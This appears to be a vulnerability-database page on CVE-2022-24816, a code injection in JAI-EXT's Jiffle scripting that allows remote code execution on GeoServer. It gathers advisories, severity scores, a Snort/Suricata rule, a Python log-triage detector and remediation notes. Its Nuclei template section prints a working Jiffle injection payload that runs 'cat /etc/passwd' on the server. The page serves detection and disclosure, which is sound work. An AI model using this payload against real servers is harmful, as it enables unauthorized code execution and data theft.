CVE-2022-24816
Published 2022-04-13
Priority P1 (100) · critical · CVSS 3.1: 10 (vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
CISA Known Exploited Vulnerability (due 2024-07-17) · exploited in the wild · initial access
EPSS: 98.74% (99.9th percentile)
JAI-EXT is an open-source project which aims to extend the Java Advanced Imaging (JAI) API. Programs allowing Jiffle script to be provided via network request can lead to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project. Version 1.2.22 will contain a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application, by removing janino-x.y.z.jar from the classpath.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| geosolutions-it | jai-ext | < 1.1.22 | 1.1.22 |
| geosolutionsgroup | jai-ext | < 1.1.22 | 1.1.22 |
Detection & IOCs (extracted from sources)
- other: ras:Jiffle
- snort: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver JT-Jiffle Extension Code Injection (CVE-2022-24816)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/geoserver/wms"; startswith; http.request_body; content:"|3c|ows|3a|Identifier|3e|ras|3a|Jiffle|3c 2f|ows|3a|Identifier|3e|"; fast_pattern; content:"java|2e|lang|2e|Runtime|2e|getRuntime|28 29|"; distance:0; reference:url,www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver; reference:cve,2022-24816; classtype:web-application-attack; sid:2056208; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state TLSDecrypt, created_at 2024_09_26, cve CVE_2022_24816, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_09_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- bytes: |3c|ows|3a|Identifier|3e|ras|3a|Jiffle|3c 2f|ows|3a|Identifier|3e|
- bytes: java|2e|lang|2e|Runtime|2e|getRuntime|28 29|
- Exploit arrives as an HTTP POST to /geoserver/wms containing an ows:Identifier element referencing 'ras:Jiffle' and injected Java code invoking java.lang.Runtime.getRuntime() in the request body.
- Successful exploitation produces an ExceptionInInitializerError in the HTTP response body alongside /etc/passwd content (root:.*:0:0:), which can be used as a response-side detection signal.
- The malicious Jiffle script payload uses a comment-injection technique to break out of the generated Java class and inject an arbitrary static initializer block that executes OS commands via Runtime.exec().
- Presence of janino-x.y.z.jar on the classpath is a prerequisite for exploitation; its presence in a GeoServer deployment should be treated as an attack-surface indicator when JAI-EXT is below version 1.1.22.
- The Snort/ET rule requires TLS decryption to be effective against HTTPS-protected GeoServer instances, as indicated by the TLSDecrypt deployment metadata.
- The patched version is JAI-EXT 1.1.22 (not 1.2.22 as stated in the NVD advisory); defenders should verify the exact artifact version on disk.
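As an added defensive example (not part of this page, the ET ruleset, or the Nuclei template), the Python below mirrors the request-side checks of the Snort/Suricata rule above (POST, URI starting with /geoserver/wms, the ras:Jiffle identifier followed by a Runtime.getRuntime() call) and the response-side matchers (HTTP 200 plus both body regexes) as plain functions that can be run over decrypted HTTP logs; the function names and the sample messages are constructed here.

```python
import re

# Request-side indicators, as in the ET rule (sid 2056208): the Jiffle
# process identifier and the Runtime call that the injected Java uses.
IDENT = b"<ows:Identifier>ras:Jiffle</ows:Identifier>"
RUNTIME = b"java.lang.Runtime.getRuntime()"

# Response-side matchers from the Nuclei template; both must be present.
RESP_PATTERNS = [re.compile(rb"root:.*:0:0:"),
                 re.compile(rb"ExceptionInInitializerError")]


def matches_request(method: str, uri: str, body: bytes) -> bool:
    """Request-side port of the rule. 'distance:0' in the rule means the
    second content match is searched relative to the end of the first, so
    the Runtime call must appear after the ras:Jiffle identifier."""
    if method.upper() != "POST" or not uri.startswith("/geoserver/wms"):
        return False
    i = body.find(IDENT)
    if i < 0:
        return False
    return body.find(RUNTIME, i + len(IDENT)) >= 0


def matches_response(status: int, body: bytes) -> bool:
    """Response-side port of the Nuclei matchers (matchers-condition: and)."""
    return status == 200 and all(p.search(body) for p in RESP_PATTERNS)


def triage(method: str, uri: str, req_body: bytes,
           status: int, resp_body: bytes) -> dict:
    """Combine both sides: a request hit alone is an attempt, a request hit
    with a response hit is a likely successful exploitation."""
    req = matches_request(method, uri, req_body)
    resp = matches_response(status, resp_body)
    return {"attempt": req, "likely_success": req and resp}


# Constructed samples, not real captures: a legitimate Jiffle WPS call and
# one carrying the Runtime indicator (no working payload is included).
BENIGN = (b"<wps:Execute>" + IDENT +
          b"<wps:LiteralData>dest = src * 2;</wps:LiteralData></wps:Execute>")
HOSTILE = (b"<wps:Execute>" + IDENT +
           b"<wps:LiteralData>dest = y(); " + RUNTIME +
           b"</wps:LiteralData></wps:Execute>")
SUCCESS_RESP = b"java.lang.ExceptionInInitializerError: root:x:0:0:root:/root:/bin/bash"

if __name__ == "__main__":
    print(triage("POST", "/geoserver/wms", HOSTILE, 200, SUCCESS_RESP))
```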
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 10.0 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| ghsa | | 10.0 | CRITICAL | |
| osv | | 10.0 | CRITICAL | |
| vulncheck | | 10.0 | CRITICAL | |
| cisa | | 10.0 | CRITICAL | |
GHSA · 2023-09-19
CVE-2022-24816 [CRITICAL] CWE-94 Improper Control of Generation of Code ('Code Injection') in jai-ext
### Impact
Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project.
### Patches
Version 1.2.22 will contain a patch that disables the ability to inject malicious code into the resulting script.
### Workarounds
Negate the ability to compile Jiffle scripts from the final application, by removing janino-x.y.z.jar from the classpath.
### References
None.
OSV · 2023-09-19: Improper Control of Generation of Code ('Code Injection') in jai-ext (same advisory text as the GHSA entry above).
OSV · 2023-06-12 · CVSS 10.0
CVE-2023-35042 [CRITICAL] GeoServer RCE due to improper control of generation of code in jai-ext `Jiffle` map algebra language
GeoServer 2, in some configurations, allows remote attackers to execute arbitrary code via `java.lang.Runtime.getRuntime().exec` in `wps:LiteralData` within a `wps:Execute` request, as exploited in the wild in June 2023.
## RCE in Jiffle
The Jiffle map algebra language, provided by jai-ext, allows efficient execution of map algebra over large images. A vulnerability, [CVE-2022-24816](https://nvd.nist.gov/vuln/detail/CVE-2022-24816), has recently been found in Jiffle that allows a code injection to be performed by properly crafting a Jiffle invocation.
In the case of GeoServer, the injection can be performed from a remote request.
## Assessment
GeoTools includes the Jiffle language as part
GHSA · 2023-06-12 · CVSS 10.0: CVE-2023-35042 [CRITICAL] GeoServer RCE due to improper control of generation of code in jai-ext `Jiffle` map algebra language (same advisory text as the OSV entry above).
VulnCheck · 2022 · CVSS 10.0
CVE-2022-24816 [CRITICAL] CWE-94 OSGeo GeoServer JAI-EXT Code Injection Vulnerability
OSGeo GeoServer JAI-EXT contains a code injection vulnerability that, when programs use jt-jiffle and allow Jiffle script to be provided via network request, could allow remote code execution.
Affected: OSGeo JAI-EXT
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2022-24816; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vulnerability=cve-2022-24816; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-24&host_type=src&vulnera
CISA · 2024-06-26 · CVSS 10.0
CVE-2022-24816 [CRITICAL] CWE-94 OSGeo GeoServer JAI-EXT Code Injection Vulnerability
Affected: OSGeo JAI-EXT
OSGeo GeoServer JAI-EXT contains a code injection vulnerability that, when programs use jt-jiffle and allow Jiffle script to be provided via network request, could allow remote code execution.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability affects a common open-source component, third-party library, or a protocol used by different products. The patched JAI-EXT is version 1.1.22: https://github.com/geosolutions-it/jai-ext/releases/tag/1.1.22, https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx; https://nvd.nist.gov/vuln/detail/CVE-2022-24816
Remediation Due Date: 2024-07-17
Suricata · 2024-09-26 · CVSS 10.0
CVE-2022-24816 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver JT-Jiffle Extension Code Injection (CVE-2022-24816)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver JT-Jiffle Extension Code Injection (CVE-2022-24816)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/geoserver/wms"; startswith; http.request_body; content:"|3c|ows|3a|Identifier|3e|ras|3a|Jiffle|3c 2f|ows|3a|Identifier|3e|"; fast_pattern; content:"java|2e|lang|2e|Runtime|2e|getRuntime|28 29|"; distance:0; reference:url,www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver; reference:cve,2022-24816; classtype:web-application-attack; sid:2056208; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state TLSDecrypt, create
Nuclei · CVSS 10.0
CVE-2022-24816 [CRITICAL] GeoServer <1.2.2 - Remote Code Execution
GeoServer
Request parameters (WPS Execute, flattened from the template):
  Identifier: ras:Jiffle
  coverage
  script: dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**
  outputType: DOUBLE
  result
Matchers:
  matchers-condition: and
  matchers:
    - type: regex
      part: body
      regex:
        - "root:.*:0:0:"
        - "ExceptionInInitializerError"
      condition: and
    - type: status
      status:
        - 200
References:
- https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb
- https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-24816
Timeline:
- 2022-04-13: published
- 2024-06-26: added to CISA KEV
- Exploited in the wild